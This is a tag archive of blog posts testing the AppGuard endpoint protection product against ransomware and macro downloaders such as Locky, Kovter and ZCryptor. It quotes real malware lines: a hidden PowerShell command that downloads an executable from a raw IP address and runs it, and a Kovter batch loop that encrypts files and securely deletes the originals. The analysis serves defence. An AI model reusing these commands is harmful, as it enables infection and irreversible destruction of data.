Tag Archives: AppGuard

Locky deployment methods just changed – Who cares?

30 July 2016

The Post ‘Locky Dropper Now Comes Embedded in the Loader’, published July 28, 2016 in the ReaQta Security Blog, clearly shows that the cyber criminals continuously develop and improve their products. In the past, Locky downloaded the encryption program from a command & control server. In the latest version the encryption program is embedded in the email attachment as strings. The moment the victim runs the loader, the encryption program is extracted from the strings to the User Space and executed from User Space.

This is no rocket science; simply the application of well-known obfuscation methods to the latest Locky variant.

And, with AppGuard installed on top of the security stack, this new Locky variant represents no real danger.

In my opinion, the next generation endpoint protection solutions available on the market will all deal effectively with this sort of zero-day malware. The example of AppGuard shows: It is simply install and forget.

With this, we will gain valuable time for the right and important things like the implementation of Two Factor Authentication or privileged accounts management, or the design of effective security procedures or user training. Unfortunately, the paradigm shift from prevention to detection prevents us from implementing and doing the right and important things. It’s time for a paradigm change…

Have a good weekend.

AppGuard is an important part of a comprehensive security stack

16 July 2016

In the past weeks I tried hard to get an idea of the capabilities of Blue Ridge Networks AppGuard. To be honest, I would not like to miss AppGuard anymore. AppGuard creates the really good feeling that, under certain conditions, many cyber-attacks are simply rendered ineffective.

AppGuard is a perfect means against all kind of Trojans and downloaders, in particular zero days. Characteristic for this kind of malware is that the malware directly drops a malicious program or downloads a malicious program from the attacker’s server and executes it afterwards. This includes e.g. most of the known Ransomware.

The User Space and MemoryGuard concept just blocks this kind of malware out-of-the-box, provided that the User Space concept is not undermined by a user who is working with high privileges permanently. In fact, if the user works with privileges which allow the Trojan program to store files outside the User Space, the concept will no longer work.

It is strongly recommended to work with the least possible privileges under normal conditions. For the case higher privileges are requested, set up an extra account with the required privileges and supply the credentials of this account if UAC requests higher privileges.

More advanced malware may try to use the Windows auto-elevation feature to acquire higher privileges and to compromise AppGuard. To protect from auto-elevation attacks just set UAC to ‘Always notify me’.

This works even in the case of a gaming computer, where e.g. WOW and TeamSpeak are heavily used. Why shouldn’t it work on a standard system?

In addition, it is strongly recommended to disable macro execution in all kind of office software, e.g. Microsoft Office, OpenOffice or LibreOffice.

Memory Guard protects against all kind of zero-day drive-by downloads, PuP (Potentially unwanted Programs) or file-less malware.

My comprehensive security stack

My comprehensive security stack. Click to enlarge.

 

AppGuard does not protect against any kind of password phishing attacks. Although popular internet browsers block many malicious URLs through URL reputation, e.g. SmartScreen Filtering in Internet Explorer or Firefox, this will not protect in the case of zero-days.

To reduce the likelihood of credential theft, turn on Two-Factor Authentication (TFA) for as many as possible internet services you use. If TFA cannot be enabled, choose a strong password and take care, means:

User awareness is the basic part of the entire security stack!

To put it succinctly: The proposed security stack will dramatically reduce the risk of cyber-attacks. Blue Ridge Networks AppGuard is an important component of this stack, in particular for the protection against all kind of zero-days.

Have a good weekend.

AppGuard successfully protects against PowerShell based zero-day malware

9 July 2016

To get a feel for the impact AppGuard has on daily operations I worked mainly on my test system in the past weeks. My test system is a 6 years old Dell Inspiron 1445 with 4 GB of RAM and a 240 GB SSD.  The latest version of Windows 10 is deployed and all out-of-the-box Windows security options like Windows Defender and SmartScreen are activated.

I work with standard user rights; UAC is set to ‘Always notify me’. Macro protection for the office suite is set to ‘Disable all macros with notification’. AppGuard is installed on top of this security stack to protect from all kind of zero days.

The impact on my daily work is hardly noticeable. Standard malware is blocked either by Defender or by SmartScreen. Even the download of e.g. JavaScript based malware from malwr.com for test purposes is a challenging task.

AppGuard does a really good job in blocking the execution all kind of zero-day malware from user space. But how well works AppGuard in the case of somewhat more advanced malware?

I searched for a new PowerShell based malware on malwr.com and found Invoice_201604469.doc.

A check on VirusTotal showed that only 3 of 56 anti-malware products identified malware:

Antivirus Result Update
Fortinet WM/Poseket.A!tr.dldr 20160706
Qihoo-360 heur.macro.powershell.a 20160706
Symantec W97M.Downloader 20160706

As always, the AutoOpen macro is password protected. But LibreOffice overrides the password protection and reveals a master piece of code:

AutoOpen Macro with Powershell code

AutoOpen Macro with PowerShell Code

I opened the document and followed the instructions to execute the AutoOpen macro.

Invoice_201604469.doc

Invoice_201604469.doc. Click to enlarge.

The effect was enormous. AppGuard’s MemoryGuard blocked the execution of the PowerShell script and prevented the download of the payload 18293.exe:

Blocked Program Message

Blocked Program Message 1

Blocked Program Message

Blocked Program Message 2

Thus the command shell wasn’t able to start the payload and Windows displayed the last error message:

Windows Error Message

Windows Error Message

MemoryGuard is a really charming concept, and out-of-the-box available after installation.

This concludes my tests. The experiments of the past weeks show that User Space and MemoryGuard are useful security features. They complete the Windows built-in security features, and provide additional protection, in particular in the case of zero-day malware.

Have a good weekend.

Developers of Ransomware JS/Nemucod.FG and Kovter take security seriously

25 June 2016

Ransomware Kovter is delivered e.g. through a malicious email attachment named Court_Notification_0000928697.doc.js. The developers of this script take security really serious.

The script downloads encryption programs from a list of malicious sites. It then calls the windows command shell and loops through every fixed and network drive in its search for files to be encrypted. The command below shows a code fragment for the encryption of files stored on drive C:

for /r "C:\" %i in (*.zip *.rar *.7z *.tar *.gz *.xls *.xlsx *.doc *.do ... ) do (
      (ECHO "%~pi" | FINDSTR /I "appdata application ... " 1>NUL)) ||
      (if %~zi LSS 10000000 if %~zi GTR 10000 (
(1)          call %TEMP%\a1.exe -mx0 -mhe -p"<Encryption Key>" "%i.crypted" "%i"
(2)          Delete %i
             ECHO %i >>"%TEMP%\a.log"
       )
       )
)

The encryption program a1.exe (1) creates an encrypted copy with extension crypted, In the next step the script deletes (2) the original file.

The Delete command is somewhat special in this case. The script downloads the program Sdelete from Windows Sysinternals and stores the downloaded file in %TEMP%\a9.exe:

xo.open("GET","https:´//live.sysinternals.com/sdelete.exe", false); 
...
if(xa.size>100000) { xa.saveToFile(%TEMP%\a9.exe",2);};

If the download is successful command a9.exe -a -q is used to delete the original file.

From the Sysinternals homepage one learns that

SDelete implements the Department of Defense clearing and sanitizing standard DOD 5220.22-M, to give you confidence that once deleted with SDelete, your file data is gone forever.

With this it is not possible to recover the deleted files with disk utilities or with the help of a data rescue lab.

Fortunately, the encryption programs are downloaded to User Space. Within the download loop the developer checks whether the program can be executed on the system. Since the program is executed from User Space AppGuard blocks the execution and prevents the script from starting the main loop over all drives and about 80 file types:

AppGuard stops A2.exe

AppGuard stops A2.exe

Appguard stops A1.exe

AppGuard stops A1.exe

In this case the java script loads two encryption programs from the attacker’s download servers. A2.exe is identified as Trojan:Win32/Dynamer!ac (Microsoft) or BehavesLike.Win32.Ramnit.cc (McAfee Gateway Edition), A1.exe as Trojan:Win32/Kovter!rfn (Microsoft) or Trojan-FIMO!571F44310A86 (McAfee Gateway Edition). The script is identified as TrojanDownloader:JS/Nemucod.FG (Microsoft) or JS/Nemucod.ie (McAfee Gateway Edition).

Take care! And have a good weekend.

AppGuard protection concepts II

19 June 2016

Preventing the execution of whatever scripts or executables from User Space is one of the basic security concepts of AppGuard. Unfortunately, the User Space concept does not work in the case of fileless malware. A very prominent representative of this malware type is Poweliks.  Poweliks was first detected in August 2014. It hides its payload in the Windows registry, no file is written during the first infection phase.

In the McAfee Labs Threats Report: November 2015 McAfee researchers described in detail how the fileless Kovter malware infects a victim’s system. Kovter writes JavaScript to the registry. This script calls an encrypted PowerShell Script which is also stored in the registry. Finally, the code is written to the memory of another process and executed within the context of this memory.

During this last write process AppGuard’s MemoryGuard enters the game:

Memory protection is designed to prevent one process (originator) from altering or reading the memory of another process (target). Attackers try to re-allocate memory, place executable code into the newly allocated memory, and then execute this code. This type of attack is known as memory code injection and memory scraping. This attack has been widely used in file-less malware which exists only in memory, and Trojan downloader type of malware.

Sound’s easy. Again, ProcessExplorer is the perfect means to show how MemoryGuard works:

Process Explorer: User Process Tree Unprotected

Process Explorer: User Process Tree Unprotected

Process Explorer: User Process Tree in Protected Mode

Process Explorer: User Process Tree in Protected Mode

In Protected mode icons and process descriptions are no longer displayed. Process Explorer retrieves these details from the process memory, and MemoryGuard blocks read access.

Process Explorer: Regedit Process Details Unprotected

Process Explorer: Process Details Unprotected

Process Explorer: Regedit Process Details Protected

Process Explorer: Process Details Protected

In Protected mode important process details are no longer displayed. Process Explorer reads these details from a process’ memory and displays them in the Properties dialogue. If AppGuard is operated in the default mode Protected, MemoryGuard blocks this reading operations, thus details about the process cannot be retrieved.

MemoryGuard is a really charming concept, and out-of-the-box available after installation.

Have a good weekend.

New developments in the field of ransomware

11 June 2016

During my test of AppGuard some new variants of ransomware showed up in the wild.

ReaQta reported a new and massive worldwide Locky ransomware spam campaign. The new variant downloads the payload in encrypted form from the attacker’s command and control server and decrypts it before execution on the victim’s system. This makes it harder for traditional anti-malware systems to identify the payload as malicious.

Since the decrypted version is executed from User Space AppGuard blocks the execution.

Microsoft reported a new variant called ZCryptor which behaves like a worm:

‘ZCryptor can initially infect targets through traditional phishing schemes, macros or fake installers, but also has the ability to place autorun files on removable storage devices. can initially infect targets through traditional phishing schemes, macros or fake installers, but also has the ability to place autorun files on removable storage devices. This means the ransomware can spread itself to other machines on portable storage devices, rather than relying on more targets to fall victim to phishing, according to Microsoft’s security advisory.’

I had to deactivate all Windows 10 security features on my test system to download the malware sample from malwr.com to the User Space of my account:

Timestamp MD5 File Name File Type Antivirus
May 27, 2016, 6:43 p.m. d1e75b274211a78d9c5d38c8ff2e1778 zcrypt.ex_ PE32 executable (GUI) Intel 80386, for MS Windows 39/57

AppGuard runs out-of-the-box in protection mode Protected with default User Space settings.

Again, AppGuard blocked the execution of z_crypt.exe, thus prevented the malware from becoming persistent and from encrypting my documents:

AppGuard stops ZCryptor

AppGuard stops ZCryptor

Even if one receives ZCryptor on a portable device AppGuard will block the execution due to the default Removable Media rule:

AppGuard Removable Media default rule

AppGuard Removable Media default rule

More about AppGuard next week.

Have a good weekend.

AppGuard protection concepts I

4 June 2016

Sysinternals Process Explorer is one of my favorite tools. And the best tool to gain an insight into the operations of Blue Ridge Networks AppGuard.

Process Explorer process tree

Process Explorer process tree

Process Explorer process tree

Process Explorer process tree details

When Process Explorer starts in Windows 10 (64 bit Version) the process is started as a child process of the user’s Explorer process. This start process extracts the 64 bit version of Process Explorer to the local temporary files directory  C:\users\kjochem\AppData\Local\Temp\procexp64.exe and runs the 64 bit version from this directory.

Modern Windows operating systems protect themselves against unintentional changes by users. They restrict change access of users to few directories, e.g. to directory C:\users\<username> in the so-called User Space and prevent write access to the System Space, e.g. C:\windows\system32, unless the user does not work with administrative privileges permanently.

When a user opens a weaponized Word document the Word application is executed in User Space. Thus the Word macro can write commands for the download of malicious content from the attacker’s command & control server to the User Space only. And downloads must be stored in User Space, and thus executed from User Space.

The script below shows how state-of-the-Art malware works. The commands are created by the AutoOpen macro in Word document 839482-Invoice-April.docm, which is identified as e.g. TrojanDownloader.Agent.BEO by ESET-NOD32, W97M.Downloader by Symantec, or WIN32/Spursint.A!cl by Windows Defender.

C:\WINDOWS\system32\cmd.exe /c PowerShell -ExecutionPolicy bypass -noprofile
-windowstyle hidden (New-Object System.Net.WebClient).DownloadFile
 (1) ('http://201.130.72.171/andac.exe','%APPDATA%\MicrosoftLan.exe');
 (2) Start-Process '%APPDATA%\MicrosoftLan.exe'

In this example the (1) andax.exe is downloaded to the user’s APPDATA directory and started (2) from the APPDATA directory afterwards. Shell Variable APPDATA expands on evaluation to C:\users\kjochem\AppData\Roaming.

The same holds for Drive-by Downloads. In the absence of write access outside the User Space the payload of Drive-by Downloads is stored in and executed from User Space.

AppGuard blocks such attacks by preventing the execution of suspicious programs from User space. Quite simple, but very effective.

After installation the default User Space settings already ensure a high level of protection:

AppGuard default User Space Protecion

AppGuard default User Space Protection

In Locked Down mode AppGuard blocks the execution of programs from User Space. With this, the execution of Process Explorer is blocked because program procexp64.exe is executed from a subdirectory of User Space:

AppGuard Blocks Process Explorer

AppGuard Blocks Process Explorer

Process Explorer Error Message

Process Explorer Error Message

Quite simple, but very effective. More about the protection concept of AppGuard next week …

Have a good weekend.